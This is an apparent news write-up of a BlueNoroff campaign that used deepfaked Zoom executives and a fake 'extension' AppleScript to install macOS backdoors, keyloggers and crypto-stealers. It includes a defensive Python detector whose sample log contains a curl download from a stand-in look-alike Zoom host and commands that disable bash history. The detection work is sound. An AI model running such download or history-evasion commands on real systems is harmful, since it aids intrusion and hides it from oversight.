Rising Cyber Threats: North Korea’s BlueNoroff and its Deceptive Tactics
Introduction to BlueNoroff
BlueNoroff, a threat actor linked to North Korea, is making headlines for its innovative approach to cyberattacks. Recently, this group has been observed targeting employees in the Web3 sector, particularly focusing on cryptocurrency foundations. What’s alarming is the use of deepfake technology to mimic familiar company executives, aiming to install malware on unsuspecting victims’ Apple macOS devices.
The Attack Unfolds
According to researchers from Huntress, the attack began when an unnamed employee from a cryptocurrency foundation received a message via Telegram from an external contact. The contact solicited a conversation and provided a Calendly link to arrange a meeting. However, this link redirected the victim to a counterfeit Zoom domain controlled by BlueNoroff.
The Zoom Meeting Deception
After several weeks of communication, the targeted employee joined a group Zoom meeting in which the other participants were deepfakes of senior executives from their own organization. When the employee reported problems with their microphone during the session, the deepfaked executives suggested downloading a Zoom extension to fix it. The "extension" was an AppleScript named "zoom_sdk_support.scpt", delivered via Telegram.
How the Malware Works
Upon execution, the AppleScript opened a legitimate Zoom webpage for the employee to see, while quietly retrieving a second-stage payload from a remote server. That payload ran a shell script which first disabled bash history logging, so that the commands it subsequently ran would leave no trace in the user's shell history. It then checked whether Rosetta 2 was installed on the compromised Mac. Rosetta 2 is the Apple component that lets Macs with Apple silicon run applications built for Intel-based Macs, so its presence determines which binaries can be executed.
Stealthy Installation Tactics
The script subsequently created a hidden file titled ".pwd" and retrieved a binary from the malicious Zoom page, utilizing it to download additional payloads. This included a Go-based backdoor known as Root Troy V4, which could execute remote commands and carry out more extensive malware deployments.
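The chain described above (AppleScript lure, bash history disabled, Rosetta 2 check, hidden ".pwd" file, fetch from a look-alike Zoom domain) maps onto simple host-level heuristics a defender can run over a shell-command audit trail. The Python below is an added example written for this page, not code from Huntress or from the campaign itself; the log format is constructed, and the command strings used to disable history or detect Rosetta 2 are assumptions about common ways to achieve those effects, not quotes from the malware.

```python
import re
from urllib.parse import urlparse

# Constructed sample audit trail: "<timestamp> <user> <command line>" per line.
SAMPLE_LOG = """\
2025-06-18T10:02:11Z alice osascript /Users/alice/Downloads/zoom_sdk_support.scpt
2025-06-18T10:02:12Z alice open https://zoom.us/support/download
2025-06-18T10:02:13Z alice curl -fsSL https://zoom-meeting-support.example/sdk.sh -o /tmp/s.sh
2025-06-18T10:02:14Z alice bash -c 'unset HISTFILE; set +o history'
2025-06-18T10:02:15Z alice /usr/bin/pgrep oahd
2025-06-18T10:02:16Z alice touch /Users/alice/.pwd
2025-06-18T10:03:00Z bob curl -fsSL https://zoom.us/client/latest/Zoom.pkg -o Zoom.pkg
2025-06-18T10:03:05Z bob git log
"""

LEGIT_ZOOM_HOSTS = ("zoom.us", "zoom.com")

# One heuristic per stage of the chain. The command strings are assumptions
# (common ways to get each effect), not strings taken from the sample.
RULES = {
    "zoom_support_applescript": re.compile(r"osascript\b.*zoom_sdk_support\.scpt", re.I),
    "bash_history_disabled": re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history|HISTSIZE=0"),
    "rosetta2_check": re.compile(r"pgrep\s+oahd|arch\s+-x86_64|/Library/Apple/usr/share/rosetta"),
    "hidden_pwd_file": re.compile(r"(?:^|[\s/'\"])\.pwd(?:\s|$)"),
}

def lookalike_zoom_host(cmd):
    """True if a URL in cmd names a host that says 'zoom' but is not a Zoom-owned domain."""
    for url in re.findall(r"https?://\S+", cmd):
        host = (urlparse(url).hostname or "").lower()
        if "zoom" in host and host not in LEGIT_ZOOM_HOSTS \
                and not host.endswith(tuple("." + h for h in LEGIT_ZOOM_HOSTS)):
            return True
    return False

def scan(log_text):
    """Return {user: {rule_name: [command, ...]}} for every line that trips a heuristic."""
    hits = {}
    for line in log_text.splitlines():
        _ts, user, cmd = line.split(" ", 2)
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.setdefault(user, {}).setdefault(name, []).append(cmd)
        if re.match(r"(curl|wget)\b", cmd) and lookalike_zoom_host(cmd):
            hits.setdefault(user, {}).setdefault("lookalike_zoom_download", []).append(cmd)
    return hits

def suspicious_users(hits, min_rules=3):
    """One user tripping several distinct stages is the signal; a lone hit is usually noise."""
    return sorted(u for u, rules in hits.items() if len(rules) >= min_rules)
```

Requiring several distinct stages per user keeps a legitimate Zoom download (bob's line above) from raising an alert on its own.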
Notable Malicious Components
Huntress's investigation uncovered eight distinct binaries on the compromised device, including:
- Telegram 2: A Nim-based binary that initiates the primary backdoor.
- Root Troy V4: A Go language backdoor designed for executing AppleScript commands and stealthily managing remote instructions.
- InjectWithDyld: A C++ binary loader that drops additional payloads, allowing the perpetrator to control the infected system asynchronously.
- XScreen: An Objective-C keylogger that captures keystrokes and clipboard content, relaying this information to a command-and-control server.
- CryptoBot: A Go-based tool to extract cryptocurrency-related files from the targeted system.
- NetChk: A largely empty binary whose only function is to generate random numbers indefinitely.
The Identity of BlueNoroff
BlueNoroff has been known by several aliases, including APT38 and TraderTraitor, and is a subgroup of the Lazarus Group, infamous for numerous cyber heists targeting financial institutions and cryptocurrency firms to fund North Korea’s economy. Their operations include high-profile incidents like the hacks of Bybit in February 2025 and Axie Infinity in March 2022.
Training Employees Against Attacks
Huntress emphasizes that remote workers are particularly susceptible to attacks by groups like BlueNoroff. It’s crucial for organizations, especially those in high-risk industries, to train their employees on recognizing social engineering tactics related to virtual meeting software.
The Larger Cyber Landscape
Assessments by cybersecurity analysts indicate that APT38 may no longer exist as it once did, having fragmented into new subdivisions like TraderTraitor and CryptoCore, focusing solely on financial theft. TraderTraitor has emerged as a leading threat in the realm of cryptocurrency heists, leveraging previous expertise from APT38 operations.
Evolving Tactics
Interestingly, the deceptive audio-related themes employed by BlueNoroff have parallels with another North Korean campaign known as Contagious Interview. This initiative utilizes fake job postings to trick applicants into running malicious scripts on the pretext of resolving camera and microphone access issues.
Cybersecurity experts note that newer variants of these attacks utilize Python-based scripts targeting Windows systems while maintaining a Golang variant for macOS. This trend highlights a significant evolution in cross-platform cyber threats.
Conclusion
The tactics employed by BlueNoroff represent a growing and sophisticated threat within the cybersecurity landscape. As the group continues to innovate in their methods, organizations, particularly in the cryptocurrency and tech sectors, must remain vigilant and proactive in their cybersecurity strategies.